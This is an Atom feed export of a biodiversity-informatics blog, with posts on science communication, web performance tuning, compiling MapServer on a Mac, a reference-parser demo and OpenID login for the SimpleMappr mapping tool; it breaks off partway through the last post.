<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:georss='http://www.georss.org/georss' xmlns:gd='http://schemas.google.com/g/2005' xmlns:thr='http://purl.org/syndication/thread/1.0'><id>tag:blogger.com,1999:blog-5846783121665026448</id><updated>2012-01-26T00:41:03.821-07:00</updated><category term='citizen science'/><category term='humour'/><category term='GUIDs'/><category term='mindmap'/><category term='spiders'/><category term='DOI'/><category term='EoL'/><category term='trees'/><category term='GBIF'/><category term='BHL'/><category term='peer-review'/><category term='CrossRef'/><title type='text'>iSpiders</title><subtitle type='html'>Discussions on spider biogeography, systematics and more general comments on biodiversity informatics.</subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://ispiders.blogspot.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default?max-results=100'/><link rel='alternate' type='text/html' href='http://ispiders.blogspot.com/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><author><name>David Shorthouse</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_VYUFlXOCOxE/SxG2s72j8XI/AAAAAAAAAI8/mLUSWrUceaQ/S220/david.jpg'/></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>68</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>100</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-5846783121665026448.post-3498697830931764411</id><published>2012-01-03T22:58:00.003-07:00</published><updated>2012-01-03T23:43:29.541-07:00</updated><title type='text'>Science is a Product in the Wrong Marketplace</title><content type='html'>Instead of mindlessly watching a movie tonight, I browsed through Google Tech Talks and stumbled upon a spectacularly argued, wonderfully cadenced, and orchestrated Sept 2011 presentation by Kristen Marhaver entitled, "Organizing the world's information by date and author is making Mother Earth Sick".&lt;br /&gt;&lt;br /&gt;&lt;iframe width="560" height="315" src="http://www.youtube.com/embed/lpA79aZ8Bug" frameborder="0" allowfullscreen&gt;&lt;/iframe&gt;&lt;br /&gt;&lt;br /&gt;Her thesis is that science is a product, not a news stream. And, because science is communicated in a self-serving, pay-wall-laden marketplace, its products to outsiders (those who stand to benefit from this knowledge) are paradoxically valueless. Kristen argues that the first steps toward cracking into this marketplace could be to expose the inherently social dimension of science by using modern day social gadgetry. Google+, Twitter and star ratings could reside around the periphery of online PDF reprint viewers. Unfortunately Kristen, this is still the wrong marketplace.&lt;br /&gt;&lt;br /&gt;The one place where the social dimension of science is abundantly obvious is the largely unchallenged scientific conference. There are ways for this energetic, youthful, exploratory dialogue to spill out onto the distant screens of those who could benefit. YouTube, Twitter, Google+ could all be used with religion at conferences because for the most part, papers delivered are free from the publisher's grasp. Google Tech Talks and TED talks are spectacularly popular for very good reason. The medium is accessible. Plus, there is ample opportunity to make conferences more accessible and engaging to registrants themselves. How many times have you heard someone deliver a paper who feels the need to introduce his/her co-authors who could not be present or to shamelessly advertise the upcoming paper/poster presentations of their graduate students? The moment someone walks up to the podium, I want all that pushed onto my iPad along with links to their reprints. I'd rather they just get on with it. If their presentation were recorded and later put on YouTube, I'd want the same experience. Sure, links to their reprints would likely throw me up against a brick pay-wall, but I'd already know and appreciate the context.&lt;br /&gt;&lt;br /&gt;To take this even further, why not really expose the scientific conference by advertising the downtime? On how many occasions have you gone to a conference, only to share a beer or two in the evening(s) WITH THE COLLEAGUES YOU ALREADY WORK WITH!? Instead, I want a post-conference un-drink. That is, I'd like to advertise my desire to have a drink by posting what I'd like to talk about and then blast the venue into the Twittersphere for members of the public to join me if they felt so inclined. If it's a bust, I'll swallow my pride and go join another one...and I'll bring copies of my reprints.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5846783121665026448-3498697830931764411?l=ispiders.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ispiders.blogspot.com/feeds/3498697830931764411/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5846783121665026448&amp;postID=3498697830931764411' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/3498697830931764411'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/3498697830931764411'/><link rel='alternate' type='text/html' href='http://ispiders.blogspot.com/2012/01/science-is-product-in-wrong-marketplace.html' title='Science is a Product in the Wrong Marketplace'/><author><name>David Shorthouse</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_VYUFlXOCOxE/SxG2s72j8XI/AAAAAAAAAI8/mLUSWrUceaQ/S220/david.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://img.youtube.com/vi/lpA79aZ8Bug/default.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5846783121665026448.post-8600932512102490984</id><published>2011-11-14T10:05:00.003-07:00</published><updated>2011-11-14T10:09:33.105-07:00</updated><title type='text'>Realtime Web</title><content type='html'>I started work on a whimsical presentation I will soon give to the Biodiversity Informatics Group at the Marine Biological Laboratory about the &lt;a href="http://en.wikipedia.org/wiki/Real-time_web"&gt;Realtime Web&lt;/a&gt; and came-up with the following kooky slide. Felt the urge to share.&lt;br /&gt;&lt;img style="width: 320px; height: 240px;" src="http://3.bp.blogspot.com/-sJxsR29HVyU/TsFK0sxhQAI/AAAAAAAAAMY/sCT4Gp20_-M/s320/Slide5.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5674899274696048642" /&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5846783121665026448-8600932512102490984?l=ispiders.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ispiders.blogspot.com/feeds/8600932512102490984/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5846783121665026448&amp;postID=8600932512102490984' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/8600932512102490984'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/8600932512102490984'/><link rel='alternate' type='text/html' href='http://ispiders.blogspot.com/2011/11/realtime-web.html' title='Realtime Web'/><author><name>David Shorthouse</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_VYUFlXOCOxE/SxG2s72j8XI/AAAAAAAAAI8/mLUSWrUceaQ/S220/david.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/-sJxsR29HVyU/TsFK0sxhQAI/AAAAAAAAAMY/sCT4Gp20_-M/s72-c/Slide5.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5846783121665026448.post-7371039119466633739</id><published>2011-11-13T13:19:00.006-07:00</published><updated>2011-11-13T16:34:21.761-07:00</updated><title type='text'>Amazing Web Site Optimizations: Priceless</title><content type='html'>Quite literally, priceless. As in costs nothing.&lt;br /&gt;&lt;br /&gt;I was obsessed with web site optimization these past few weeks, trying to trim off every bit of fat from page render times. As we all know, if a page takes longer than approx. 3-4 seconds to render, then you can &lt;a href="http://www.getelastic.com/performance/"&gt;expect to lose your audience&lt;/a&gt;. Even though expectations for speed vary depending on the end-user's geographic location, having a website that can be equally fast for a user in Beijing is just as important as the experience for a user in California. As might be expected, server hardware typically isn't the bottleneck. Another way of looking at this is to recognize that remarkable boosts in performance can be had on crap hardware. So, this post presents the tools I used to measure web site performance and describes the simple techniques I employed to trim the excess fat.&lt;br /&gt;&lt;br /&gt;My drug of choice to measure the effect of every little (or major) tweak has been &lt;a href="http://www.webpagetest.org/"&gt;WebPagetest&lt;/a&gt;, a truly invaluable service because I can quickly see where in the world and why my web page suffered. Knowing that it took 'x' ms to download and render a JavaScript file or 'y' ms to do the same for a css file meant I could see with precision what a bit of js or css cleansing does to a user's perception of my web site. I also used &lt;a href="http://getfirebug.com/"&gt;Firebug&lt;/a&gt; and Yahoo's &lt;a href="http://developer.yahoo.com/yslow/"&gt;YSlow&lt;/a&gt;, both as FireFox plug-ins. Google Chrome also has a &lt;a href="http://code.google.com/speed/page-speed/docs/rules_intro.html"&gt;Page Speed&lt;/a&gt; extension that I used to produce a few optimized versions of graphics files.&lt;br /&gt;&lt;br /&gt;Some tricks I employed to great effect, in order from most to least important:&lt;br /&gt;&lt;ol&gt;&lt;li&gt;Make css sprites. The easiest tool I found was the &lt;a href="http://spritegen.website-performance.org/"&gt;CSS Sprite Generator&lt;/a&gt;. Upload a zipped folder of icons and it spits out a download and a css file. Could it be any easier? Making a css sprite eliminates a ton of unnecessary HTTP requests and is by far the most important technique to slash load times.&lt;/li&gt;&lt;li&gt;Minify JavaScript and css. For the longest time, I was using the facile &lt;a href="http://www.minifyjavascript.com/"&gt;JavaScript Compressor&lt;/a&gt;, but the cut/paste workflow became too much of a pain. So, I elected to use some server-side code to do the same: &lt;a href="https://github.com/rgrove/jsmin-php/"&gt;jsmin-php&lt;/a&gt; and &lt;a href="http://code.google.com/p/cssmin/"&gt;CssMin&lt;/a&gt;. When my page is first rendered, the composite js and css files are made in memory then saved to disk. Upon re-rendering (by anyone), the minified versions are served. &lt;a href="https://github.com/dshorthouse/SimpleMappr/blob/master/lib/mapprservice.header.class.php"&gt;Here's the PHP class&lt;/a&gt; I wrote that does this for me. Whenever I deploy new code, the cached files are deleted then recreated with a new MD5 hash as file titles.&lt;/li&gt;&lt;li&gt;Properly configured web server. This is especially important for a user's second, third+ visit. You'd be crazy not to take advantage of the fact that a client's browser can cache! I use Apache and here's what I have:&lt;br /&gt;&lt;br /&gt;&amp;lt;Directory "/var/www/SimpleMappr"&amp;gt;&lt;br /&gt;Options -Indexes +FollowSymlinks +ExecCGI&lt;br /&gt;AllowOverride None&lt;br /&gt;Order allow,deny&lt;br /&gt;Allow from all&lt;br /&gt;DirectoryIndex index.php&lt;br /&gt;FileETag MTime Size&lt;br /&gt;&amp;lt;IfModule mod_expires.c&amp;gt;&lt;br /&gt;&amp;lt;FilesMatch "\.(jpe?g|png|gif|js|css|ico|php|htm|html)$"&amp;gt;&lt;br /&gt; ExpiresActive On&lt;br /&gt; ExpiresDefault "access plus 1 week"&lt;br /&gt;&amp;lt;/FilesMatch&amp;gt;&lt;br /&gt;&amp;lt;/IfModule&amp;gt;&lt;br /&gt;&amp;lt;/Directory&amp;gt;&lt;br /&gt;&lt;br /&gt;Notice that I use the mod_expires module. I also set the FileETag to MTime Size, though this was marginally effective.&lt;/li&gt;&lt;li&gt;Include ALL JavaScript files just before the closing body tag. This  boosts the potential for parallelism and the page can begin rendering  before all the JavaScript has finished downloading.&lt;br /&gt;&lt;/li&gt;&lt;li&gt;Serve JavaScript libraries from a Content Delivery Network (CDN). I use jQuery and serve it from &lt;a href="http://docs.jquery.com/Downloading_jQuery#CDN_Hosted_jQuery"&gt;Google&lt;/a&gt;.  Be weary that on average, it is best to ONLY have 4 external sites from  which content will be drawn. This includes static content servers that  might be a subdomain associated with your web site. Beyond 3 external  domains or subdomains, DNS look-up times outweigh the benefit of  parallelism, especially for aged versions of Internet Explorer. Modern browsers are capable of more simultaneous connections, but we cannot (yet) ignore IE. I once served jQueryUI via the Google CDN, but because this  was yet another HTTP request, it was slower than had I served it from  my own server. So, I now pull jQuery from the Google CDN and I include  jQueryUI with my own JavaScript in a single minified file from from my  server.&lt;/li&gt;&lt;li&gt;Use a Content Delivery Network. I use &lt;a href="https://www.cloudflare.com/"&gt;CloudFlare&lt;/a&gt; because it's free, was configured in 5 minutes and within a day, there was noticeable global improvement in web page speed as measured via WebPagetest. Because I regularly push new code, I use the CloudFlare API to flush their caches whenever I deploy. However, this is largely unnecessary because they do not cache HTML and as mentioned earlier, I make an MD5 hash as my js and css file titles.&lt;br /&gt;&lt;/li&gt;&lt;/ol&gt;So there you have it, I was able to trim 4-6 seconds from a very JavaScript-heavy web site. And, web page re-render speed is typically sub-second from most parts of the world. Because much of the content is proxied through CloudFlare, my little server barely breaks a sweat.&lt;br /&gt;&lt;br /&gt;Did I mention that none of the above cost me anything?&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5846783121665026448-7371039119466633739?l=ispiders.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ispiders.blogspot.com/feeds/7371039119466633739/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5846783121665026448&amp;postID=7371039119466633739' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/7371039119466633739'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/7371039119466633739'/><link rel='alternate' type='text/html' href='http://ispiders.blogspot.com/2011/11/amazing-web-site-optimizations.html' title='Amazing Web Site Optimizations: Priceless'/><author><name>David Shorthouse</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_VYUFlXOCOxE/SxG2s72j8XI/AAAAAAAAAI8/mLUSWrUceaQ/S220/david.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5846783121665026448.post-1342287357292421174</id><published>2011-06-26T16:59:00.005-06:00</published><updated>2011-06-26T17:18:44.013-06:00</updated><title type='text'>SimpleMappr Embedded</title><content type='html'>I never had high hopes for &lt;a href="http://www.simplemappr.net/"&gt;SimpleMappr&lt;/a&gt;. There are plenty of desktop applications to produce publication-quality point maps. But it turns out, users find these hard to use or are too rich for their pocket books. As a result, my little toy and its API are getting a fair amount of use. I find this greatly encouraging so I occasionally clean-up the code and add a few logical, unobtrusive options.&lt;br /&gt;&lt;br /&gt;A number of users appear to want outputs for copy-paste on web pages and not copy-paste into manuscripts, so I just wrote an extension to permit embedding.&lt;br /&gt;&lt;br /&gt;Here's one such example using the URL&lt;br /&gt;&lt;a href="http://www.simplemappr.net/?map=643&amp;amp;width=500&amp;amp;height=250"&gt;http://www.simplemappr.net/?map=643&amp;amp;width=500&amp;amp;height=250&lt;/a&gt;:&lt;br /&gt;&lt;br /&gt;&lt;img src="http://www.simplemappr.net/?map=643&amp;amp;width=500&amp;amp;height=250" /&gt;&lt;br /&gt;&lt;br /&gt;Happy mapping...&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5846783121665026448-1342287357292421174?l=ispiders.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ispiders.blogspot.com/feeds/1342287357292421174/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5846783121665026448&amp;postID=1342287357292421174' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/1342287357292421174'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/1342287357292421174'/><link rel='alternate' type='text/html' href='http://ispiders.blogspot.com/2011/06/simplemappr-embedded.html' title='SimpleMappr Embedded'/><author><name>David Shorthouse</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_VYUFlXOCOxE/SxG2s72j8XI/AAAAAAAAAI8/mLUSWrUceaQ/S220/david.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5846783121665026448.post-1874208591636318681</id><published>2010-11-15T08:04:00.002-07:00</published><updated>2010-11-15T08:27:42.583-07:00</updated><title type='text'>Lightweight, Cross-platform, Real-time Browser-Browser Communications</title><content type='html'>During a monthly meeting to discuss cutting edge technologies here at the Biodiversity Informatics Group at the Marine Biological Laboratory, I demonstrated a technique to update distributed browsers in the face of collaborative classification (i.e. tree) editing. In essence, if there are 2+ people asynchronously (i.e. via AJAX calls) updating content on a web page, there is potential for everyone to get horribly out of sync with one another. Imagine for example a chat window on a web page that does not update on everyone's web page in real time....wouldn't make for a particularly pleasant or useful experience for anyone. The same lousy experience was true in the LifeDesks tree editor when 2+ people were simultaneously updating the same classification. Person A might delete or move a node and person B, C, D, ... etc. are none the wiser and might later perform an action on that node (or its children) whereas the database no longer reflects what they see in their browser screen.&lt;br /&gt;&lt;br /&gt;&lt;object width="480" height="385"&gt;&lt;param name="movie" value="http://www.youtube.com/v/-QHSvYrP0O4?fs=1&amp;amp;hl=en_US"&gt;&lt;/param&gt;&lt;param name="allowFullScreen" value="true"&gt;&lt;/param&gt;&lt;param name="allowscriptaccess" value="always"&gt;&lt;/param&gt;&lt;embed src="http://www.youtube.com/v/-QHSvYrP0O4?fs=1&amp;amp;hl=en_US" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="480" height="385"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;br /&gt;&lt;br /&gt;To work around the possibility that everyone editing can get horribly out of sync with one another, I implemented a polling mechanism to grab recent adjustments to data every 5 seconds. If you happen to be looking at a portion of the tree that someone else has just deleted or moved elsewhere in the tree, relevant nodes within the tree will now automagically refresh to reflect actions that someone else just did...nodes will flash red then disappear, nodes will flash green then appear, etc. There is also a scrolling activity monitor at the bottom of the screen. To be sure, this isn't a particularly robust mechanism because there is constant polling. Enter web sockets...&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.linkedin.com/in/ryanschenk"&gt;&lt;br /&gt;Ryan Schenk&lt;/a&gt; who attended this informal demonstration alerted me to &lt;a href="http://socket.io/"&gt;Socket IO&lt;/a&gt;. I knew of it, but never paid much attention. However, after having poked around a little bit with the examples provided, I am convinced this is the way I should have designed real-time classification tree updates in the face of 2+ simultaneous user actions. The lightweight technique will prove useful for any client-client communications (e.g. real time chat). Plus, it has the excellent benefit of cross-browser, cross-platform capabilities with very little server strain. A database need only be hit once when person A exerts an action and the data propagates to all other users. Very cool.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5846783121665026448-1874208591636318681?l=ispiders.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ispiders.blogspot.com/feeds/1874208591636318681/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5846783121665026448&amp;postID=1874208591636318681' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/1874208591636318681'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/1874208591636318681'/><link rel='alternate' type='text/html' href='http://ispiders.blogspot.com/2010/11/lightweight-cross-platform-real-time.html' title='Lightweight, Cross-platform, Real-time Browser-Browser Communications'/><author><name>David Shorthouse</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_VYUFlXOCOxE/SxG2s72j8XI/AAAAAAAAAI8/mLUSWrUceaQ/S220/david.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5846783121665026448.post-2614978647949429957</id><published>2010-11-12T13:13:00.015-07:00</published><updated>2010-11-12T13:47:20.366-07:00</updated><title type='text'>MapServer, MapScript, MacPorts</title><content type='html'>&lt;div style="float: left; height: 90px;"&gt;&lt;img style="width: 183px; height: 70px; vertical-align: middle;" src="http://2.bp.blogspot.com/_VYUFlXOCOxE/TN2jQVpVxlI/AAAAAAAAAKY/vsldFj8MyXU/s320/macports-logo-top.png" alt="" border="0" /&gt;&lt;/div&gt;&lt;div style="float: right; height: 90px;"&gt;&lt;img style="width: 320px; height: 85px; vertical-align: middle;" src="http://3.bp.blogspot.com/_VYUFlXOCOxE/TN2jJ69ID8I/AAAAAAAAAKQ/gfRgOV9gj8s/s320/banner.png" alt="" border="0" /&gt;&lt;/div&gt;&lt;div style="clear: both;"&gt;&lt;/div&gt;&lt;br /&gt;For anyone wishing to get into &lt;a href="http://mapserver.org/"&gt;MapServer&lt;/a&gt; and serve shapefiles via PHP and also use a Mac with &lt;a href="http://www.macports.org/"&gt;MacPorts&lt;/a&gt; for local development, here is how to compile. I discovered the hard way that the &lt;a href="http://trac.macports.org/browser/trunk/dports/gis/mapserver/Portfile"&gt;MacPorts port&lt;/a&gt; for MapServer is horribly dated and DOES NOT include PHP-MapScript. Compile instructions below assume you already have the php5 MacPort.&lt;br /&gt;&lt;br /&gt;Install some dependencies if you haven't already got them:&lt;br /&gt;&lt;br /&gt;sudo port install php5-gd&lt;br /&gt;sudo port install xpm&lt;br /&gt;sudo port install proj&lt;br /&gt;sudo port install geos&lt;br /&gt;sudo port install gdal&lt;br /&gt;&lt;br /&gt;1. Download latest MapServer tarball, http://mapserver.org/download.html (e.g. at time of writing &lt;a href="http://download.osgeo.org/mapserver/mapserver-5.6.5.tar.gz"&gt;http://download.osgeo.org/mapserver/mapserver-5.6.5.tar.gz&lt;/a&gt;)&lt;br /&gt;2. Extract and cd into folder&lt;br /&gt;3. Execute from command line:&lt;br /&gt;&lt;br /&gt;$ ./configure \&lt;br /&gt;--prefix=/usr \&lt;br /&gt;--with-agg \&lt;br /&gt;--with-proj=/opt/local \&lt;br /&gt;--with-geos=/opt/local/bin/geos-config \&lt;br /&gt;--with-gdal=/opt/local/bin/gdal-config \&lt;br /&gt;--with-threads \&lt;br /&gt;--with-ogr \&lt;br /&gt;--without-tiff \&lt;br /&gt;--with-freetype=/opt/local \&lt;br /&gt;--with-xpm=/opt/local \&lt;br /&gt;--with-png=/opt/local \&lt;br /&gt;--with-jpeg=/opt/local \&lt;br /&gt;--with-gd=/opt/local \&lt;br /&gt;--with-wfs \&lt;br /&gt;--with-wcs \&lt;br /&gt;--with-wmsclient \&lt;br /&gt;--with-wfsclient \&lt;br /&gt;--with-sos \&lt;br /&gt;--with-fribidi-config \&lt;br /&gt;--with-experimental-png \&lt;br /&gt;--with-php=/opt/local&lt;br /&gt;&lt;br /&gt;4. Execute from command line: $ make&lt;br /&gt;5. Verify that mapserv is working by executing ./mapserv -v&lt;br /&gt;6. Find php_mapscript.so in mapscripts/php3 and move to PHP extensions directory (usually /opt/local/lib/php/extensions/no-debug-non-zts-20090626/ for MacPorts). You may also need to add php_mapscript.so to your php.ini.&lt;br /&gt;7. Move mapserv into cgi-bin folder for web server and give permission to execute if desire using it directly (optional)&lt;br /&gt;&lt;br /&gt;If MacPorts's &lt;a href="http://www.gdal.org/"&gt;GDAL&lt;/a&gt; were similarly updated to v. 1.7.3, you could use GeoRSS data just as you would use shapefiles. But, alas, at the time of writing, the version in MacPorts is v. 1.6.2.&lt;br /&gt;&lt;br /&gt;While we're on the mapping kick, here is a very excellent source of shapefiles: &lt;a href="http://www.naturalearthdata.com/"&gt;http://www.naturalearthdata.com/&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;...and a bit of &lt;a href="http://dev.numerex.com/code-snippets/article/consuming-georss-feeds-with-php/"&gt;PHP code to consume GeoRSS&lt;/a&gt; using the Magpie RSS library. The author uses some deprecated PHP functions in places, but it is nonetheless quite useful.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5846783121665026448-2614978647949429957?l=ispiders.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ispiders.blogspot.com/feeds/2614978647949429957/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5846783121665026448&amp;postID=2614978647949429957' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/2614978647949429957'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/2614978647949429957'/><link rel='alternate' type='text/html' href='http://ispiders.blogspot.com/2010/11/mapserver-mapscript-macports.html' title='MapServer, MapScript, MacPorts'/><author><name>David Shorthouse</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_VYUFlXOCOxE/SxG2s72j8XI/AAAAAAAAAI8/mLUSWrUceaQ/S220/david.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_VYUFlXOCOxE/TN2jQVpVxlI/AAAAAAAAAKY/vsldFj8MyXU/s72-c/macports-logo-top.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5846783121665026448.post-2924585229000122690</id><published>2010-08-21T11:54:00.016-06:00</published><updated>2012-01-18T14:04:54.994-07:00</updated><title type='text'>Reference Parser Revived</title><content type='html'>&lt;style type="text/css"&gt;.refparser-icon{margin-left:3px;vertical-align:middle;}&lt;/style&gt;&lt;br /&gt;&lt;script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.7.1/jquery.min.js"&gt;&lt;/script&gt;&lt;script type="text/javascript" src="http://refparser.shorthouse.net/assets/jquery.refparser.js"&gt;&lt;/script&gt;&lt;script type="text/javascript"&gt;$(function(){var options = {target  : '_blank'};$(".biblio-entry").refParser(options);});&lt;/script&gt;&lt;br /&gt;Many moons ago, I once developed a tool that does real time discovery of scientific references using a combination of the aged (though still very useful) &lt;a href="http://paracite.eprints.org/developers/"&gt;ParaTools&lt;/a&gt; and &lt;a href="http://www.crossref.org/"&gt;CrossRef&lt;/a&gt;'s OpenURL service. With the demise of my server, this bit of code was lost. &lt;span style="text-decoration: line-through;"&gt;I just revived the code and functionality and provide it here for anyone else to take it and refine it&lt;/span&gt; UPDATE: parsing is now executed with a Ruby gem: &lt;a href="http://refparser.shorthouse.net//"&gt;http://refparser.shorthouse.net/&lt;/a&gt;. This location is not likely to persist so get it while you can. To get a sense of what it does, here are some verbatim references. Click the magnifying glass after each reference to experience the magic. Cross-domain AJAX requests are circumvented by using jQuery's clever JSONP handling.&lt;p class="biblio-entry"&gt;Bell, C. D., &amp;amp; Patterson R. W. (2000).  Molecular phylogeny and biogeography of &lt;em&gt;Linanthus&lt;/em&gt; (Polemoniaceae).  &lt;em&gt;American Journal of Botany&lt;/em&gt;. &lt;strong&gt;87&lt;/strong&gt;, 1857-1870.&lt;/p&gt;&lt;p class="biblio-entry"&gt;Epling, C., &amp;amp; Dobzhansky T. (1942).  Genetics of natural populations. VI. Microgeographic races in &lt;em&gt;Linanthus parryae&lt;/em&gt;. &lt;em&gt;Genetics&lt;/em&gt;. &lt;strong&gt;27&lt;/strong&gt;, 317-332.&lt;/p&gt;&lt;p class="biblio-entry"&gt;Epling, C., Lewis H., &amp;amp; Ball F. M. (1960).  The Breeding Group and Seed Storage: A Study in Population Dynamics. &lt;em&gt;Evolution&lt;/em&gt;. &lt;strong&gt;14&lt;/strong&gt;, 238-255.&lt;/p&gt;&lt;br /&gt;Similarly, this can be done with an input box. Paste a reference and press enter:&lt;br /&gt;&lt;input type="text" class="biblio-entry" style="width:90%;display:inline;height:1.5em;line-height:1.5em;" /&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5846783121665026448-2924585229000122690?l=ispiders.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ispiders.blogspot.com/feeds/2924585229000122690/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5846783121665026448&amp;postID=2924585229000122690' title='2 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/2924585229000122690'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/2924585229000122690'/><link rel='alternate' type='text/html' href='http://ispiders.blogspot.com/2010/08/reference-parser-revived.html' title='Reference Parser Revived'/><author><name>David Shorthouse</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_VYUFlXOCOxE/SxG2s72j8XI/AAAAAAAAAI8/mLUSWrUceaQ/S220/david.jpg'/></author><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5846783121665026448.post-3405623771239598783</id><published>2010-07-27T07:40:00.003-06:00</published><updated>2010-07-27T07:56:10.211-06:00</updated><title type='text'>Authentication Made Easy</title><content type='html'>I am swamped by the number of user names and passwords I have to remember and, quite frankly, if a new resource I stumble upon requires me to remember yet another account for me to access or do something I need, it's a deterrent and I'll go elsewhere. While developing features for &lt;a href="http://www.simplemappr.net/"&gt;SimpleMappr&lt;/a&gt;, it occurred to me that users probably would like to save a template of a naked map and then populate it with various bits of data at various times. In other words, it would be handy to just draw-up a template and use it whenever creating something new. Rather than making yet another user account system (ugh!) for this map template saving tool, I made use of &lt;a href="http://www.janrain.com/"&gt;Janrain&lt;/a&gt;'s (formerly RPX) OpenID system. In less than an hour, I made a 2-click user authentication system for users. While Janrain is a for-profit company, it's only a matter of time for an open-source equivalent at which time I can probably just switch and not have to adjust the database schema or much of my code.&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) 